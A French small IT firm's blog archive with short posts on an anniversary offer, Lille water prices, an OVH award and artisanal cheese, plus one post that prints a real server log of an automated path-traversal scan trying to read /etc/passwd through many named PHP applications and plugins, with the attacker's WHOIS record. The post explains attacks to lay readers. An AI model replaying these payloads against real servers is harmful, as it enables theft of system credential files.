Category Archives: Nouvelles

En 2016 l’EURL Barme a…

1000b ans !

Le b signale qu’il s’agit d’un nombre écrit en binaire (base 2) ; on mettrait un h pour de l’hexadécimal (base 16). Ces 2 bases,  binaire et hexadécimale sont les bases utilisées en informatique.

Le nombre 8 en décimal s’écrit 1000b en binaire et, fondée en 2008, L’EURL Barme a 8 ans en 2016…

En 8 ans, l’EURL Barme a accumulé plein d’énergie, au moins pour les 10h prochaines années.

A cette occasion l’EURL Barme est donc heureuse d’offrir à ses fidèles ou futurs clients qui le demandent une réserve d’énergie d’autant de mAh que d’euros HT de prestations facturées en 2016, par unité entière de batterie de secours, dans la limite  de 5 batteries par client et des stocks disponibles.

10000mAhCaractéristiques détaillées.

2000mAhCaractéristiques détaillées.

 

Le prix de l’eau à Lille

A partir du 1er janvier 2016 le fournisseur d’eau change à Lille.

Dans le courrier en date du 14/12/15 qui annonce ce changement, on peut lire : Nous sommes fiers par ailleurs de vous informer de la mise en place d’une nouvelle tarification intégrant une part fixe fortement réduite…

EdN-ileoEn effet, si on compare le détail de la dernière facture avec les tarifs annoncés par le nouveau fournisseur, on peut anticiper une hausse de 66% de la part fixe et de 21% de la part variable pour le fournisseur.

La surveillance de sa consommation va devenir encore plus intéressante…

 

L’EURL Barme, lauréat des Trophées Infrastructures 2014 d’OVH

L'EURL Barme lauréat des Trophées infrastructures 2014 d'OVH

L’EURL Barme lauréat des Trophées infrastructures 2014 d’OVH

Cette reconnaissance de la part d’OVH des prestations de l’EURL Barme porte plus d’un message :

  •  L’EURL Barme peut mettre en œuvre des solutions opérationnelles qui obtiennent l’approbation d’un des acteurs de l’Informatique le plus innovant et le plus performant de son secteur d’activité.
  •  Une solution simple, en apparence au moins, peut être jugée efficace et performante même si elle est comparée à d’autres sans doute bien plus complexes.
  •  De toutes petites structures peuvent valoir bien plus que leurs gros concurrents.

Candidater à ce concours était une excellente idée !

Vidéo : Trophee

Détente de geek

OLYMPUS DIGITAL CAMERA

Il y a trois fromages sur ce plateau : de la tomme, de la frontine et du chèvre.

Cette tomme et cette frontine sont des fromages 200% naturels ;  ils ont été faits de façon totalement artisanale par Christian Favre, un agriculteur savoyard à Pralognan la Vanoise.

Christian a quatre vaches laitières et quelques génisses (destinées à remplacer les laitières). Ce sont des tarines, ces vaches à la belle robe brune et aux magnifiques yeux noirs surmontés de cils que l’on dirait maquillés avec du mascara.

Quatre vaches : elles sont donc traites à la main, à l’étable en hiver et dans les près en été ; ce serait trop long de laver une trayeuse automatique juste pour quatre vaches ! Par contre, tous les près de Christian ne sont pas de trop pour nourrir ses vaches et ses génisses. Christian fauche son foin avec l’aide de son antique Massey Fergusson. Il le laisse sécher à l’air pur des montagnes avant de le botteler et de le ranger dans ses granges pour l’hiver.

Ce sont donc des vaches élevées en plein air plus de la moitié de l’année et sinon nourries à l’étable avec du foin récolté dans les alpages très loin de toute notion d’agriculture intensive.

Le lait de ces vaches qui reste de la vente directe et de la production des yaourts est utilisé pour la fabrication de la tomme et de la frontine. Là encore, cette production est complètement artisanale. Le lait auquel on ajoute un peu de caillette de veau est chauffé dans un chaudron ancestral en cuivre, un peu plus longtemps pour la frontine que pour la tomme mais moins que pour du beaufort. Après moulage, égouttage et salage, ces fromages sont affinés dans la cave derrière l’étable.

Ce serait impossible de faire un fromage plus naturel.

Sur la photo plus haut, ces fromages sont présentés sur un plateau taillé dans le tronc d’un épicéa familial de plus de 30 ans, planté autrefois par Michel Barme lui-même. Curieusement, c’est un bois dur. Pour réaliser ce plateau, il a été poli à la main par Laurent Barme, petit à petit, pendant des heures réparties sur plusieurs semaines.

Polir lentement du bois à la main entre deux pages de code, rien de tel comme détente pour un vieux geek.

 

Un bel exemple de cyberattaque L7

A quoi ressemble une cyberattaque dans la réalité (et pas comme au cinéma où une jolie tête de mort apparaît sur l’écran d’un ordinateur) ?

Et bien à ça :

107.23.240.63 – – [27/Jan/2014:23:17:28 +0100] “GET /KikChat/private.php?name=../../../../../../../../../../etc/passwd%00 HTTP/1.0” 404 500 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:28 +0100] “GET /private.php?name=../../../../../../../../../../etc/passwd%00 HTTP/1.0” 404 492 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:28 +0100] “GET /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00 HTTP/1.0” 404 554 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:28 +0100] “GET /I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00 HTTP/1.0” 404 550 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:29 +0100] “GET /index.php?page=../../../../../../../../../etc/passwd%00 HTTP/1.0” 200 1848 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:29 +0100] “GET /gwebmail/?module=../../../../etc/passwd%00 HTTP/1.0” 404 490 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:29 +0100] “GET /?module=../../../../etc/passwd%00 HTTP/1.0” 200 1848 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:29 +0100] “GET /spywall/languageTest.php?&language=../../../../../../../../etc/passwd%00 HTTP/1.0” 404 505 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:29 +0100] “GET /languageTest.php?&language=../../../../../../../../etc/passwd%00 HTTP/1.0” 404 497 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:29 +0100] “GET /spywall/releasenotes.php?relfile=../../../../../etc/passwd%00 HTTP/1.0” 404 505 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:30 +0100] “GET /releasenotes.php?relfile=../../../../../etc/passwd%00 HTTP/1.0” 404 497 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:30 +0100] “GET /asaancart%20v-0.9/libs/smarty_ajax/index.php?_=&f=update_intro&page=../../../../../etc/passwd%00 HTTP/1.0” 404 523 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:31 +0100] “GET /smarty_ajax/index.php?_=&f=update_intro&page=../../../../../etc/passwd%00 HTTP/1.0” 404 502 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:31 +0100] “GET /index.php?_=&f=update_intro&page=../../../../../etc/passwd%00 HTTP/1.0” 200 1848 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:31 +0100] “GET /acp/index.php?p=../../../../../../../etc/passwd%00 HTTP/1.0” 404 494 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:31 +0100] “GET /index.php?p=../../../../../../../etc/passwd%00 HTTP/1.0” 200 1848 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:32 +0100] “GET /frontend/js.php?module=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0” 404 496 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:32 +0100] “GET /js.php?module=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0” 404 487 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:32 +0100] “GET /index.php?xajax=SelTheme&xajaxargs[]=../../../../../../../../../../etc/passwd%00 HTTP/1.0” 200 1848 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:32 +0100] “GET /index.php?option=com_rsappt_pro2&view=../../../../../../etc/passwd%0000 HTTP/1.0” 200 1848 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:34 +0100] “GET /sessions.php?globalIncludeFilePath=../../../../../../etc/passwd%0000 HTTP/1.0” 404 493 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:34 +0100] “GET /idoit/controller.php?load=&lang=../../../../../../etc/passwd%00 HTTP/1.0” 404 501 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:34 +0100] “GET /controller.php?load=&lang=../../../../../../etc/passwd%00 HTTP/1.0” 404 495 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:35 +0100] “GET /jcow/index.php?p=../../../../../../etc/passwd%00 HTTP/1.0” 404 495 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:35 +0100] “GET /index.php?p=../../../../../../etc/passwd%00 HTTP/1.0” 200 1848 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:35 +0100] “GET /vanilla/index.php?p=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0” 404 498 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:35 +0100] “GET /wp-content/plugins/wp-custom-pages/wp-download.php?url=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0” 404 531 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:35 +0100] “GET /wp-content/plugins/old-post-spinner/logview.php?ops_file=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0” 404 528 “-” “-”
107.23.240.63 – – [27/Jan/2014:23:17:35 +0100] “GET /modules/maticmarket/deco/blanc/haut.php?modulename=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0” 404 520 “-” “-“

Les traces réelles d’une cyberattaque…

Joli, non ?

La toute  petite taille de caractère permet d’avoir une vue d’ensemble. Les non informaticiens n’en verraient pas plus en plus gros. Les autres sauront comment accéder à une présentation plus lisible.

L’attaque (85 tentatives en 24 secondes à 23:17 hier soir) cherche à exploiter des failles de sécurité pour récupérer le fichier qui contient les mots de passe du serveur. Ils y sont sous leur forme cryptée mais ce fichier récupéré pourrait être confortablement soumis à un traitement de décodage intensif et donner ainsi un accès pratique au serveur visé par l’attaque.

L’attaquant est identifié par 107.23.240.63, son adresse IP.  On obtient facilement une description plus complète à son sujet :

NetRange:       107.20.0.0 – 107.23.255.255
CIDR:           107.20.0.0/14
OriginAS:
NetName:        AMAZON-EC2-8
NetHandle:      NET-107-20-0-0-1
Parent:         NET-107-0-0-0-0
NetType:        Direct Assignment
Comment:        The activity you have detected originates from a dynamic hosting environment.
Comment:        For fastest response, please submit abuse reports at http://aws-portal.amazon.com/gp/aws/html-forms-controller/contactus/AWSAbuse
Comment:        For more information regarding EC2 see:
Comment:        http://ec2.amazonaws.com/
Comment:        All reports MUST include:
Comment:        * src IP
Comment:        * dest IP (your IP)
Comment:        * dest port
Comment:        * Accurate date/timestamp and timezone of activity
Comment:        * Intensity/frequency (short log extracts)
Comment:        * Your contact details (phone and email) Without these we will be unable to identify the correct owner of the IP address at that point in time.
RegDate:        2011-05-03
Updated:        2012-03-02
Ref:            http://whois.arin.net/rest/net/NET-107-20-0-0-1OrgName:        Amazon.com, Inc.
OrgId:          AMAZO-4
Address:        Amazon Web Services, Elastic Compute Cloud, EC2
Address:        1200 12th Avenue South
City:           Seattle
StateProv:      WA
PostalCode:     98144
Country:        US
RegDate:        2005-09-29
Updated:        2009-06-02
Comment:        For details of this service please see
Comment:        http://ec2.amazonaws.com/
Ref:            http://whois.arin.net/rest/org/AMAZO-4

L’attaque est donc menée depuis un serveur virtuel proposé à  location à n’importe qui sur le “Cloud” par une compagnie américaine installée à Seattle. La description fournit même des indications sur la procédure à utiliser pour dénoncer les abus, à condition de révéler les détails de son identité, évidemment !

L’attaque, sans doute menée en parallèle sur des milliers d’autres ordinateurs, a certainement abouti quelque part et fourni par exemple aux cyber-pirates un nouveaux serveur pour lancer d’autres attaques. C’est une activité très répandue de nos jours et facilement praticable en toute impunité.

Et le “L7” ?

“L7” signifie ici “level 7” (niveau 7) et fait référence à la plus haute  couche du modèle ISO 7498. Ce modèle abstrait désigne une classifications par ailleurs complètement inutile mais en l’occurrence, une “cyberattaque de niveau 7” fait tout de suite beaucoup plus sérieux.

Pourquoi un blog pour l’EURL Barme ?

Pour mettre des informations à la disposition des clients (ou futurs clients) de l’EURL Barme !

  • des informations simples et utiles, évidemment,
  • des nouvelles,
  • des explications générales qui intéressent tout le monde,
  • des documents qui pourront servir de support à des explications plus détaillées.

Bref, toutes sortes d’informations qui sont bien mieux ici que sur le site Internet principal de l’EURL Barme.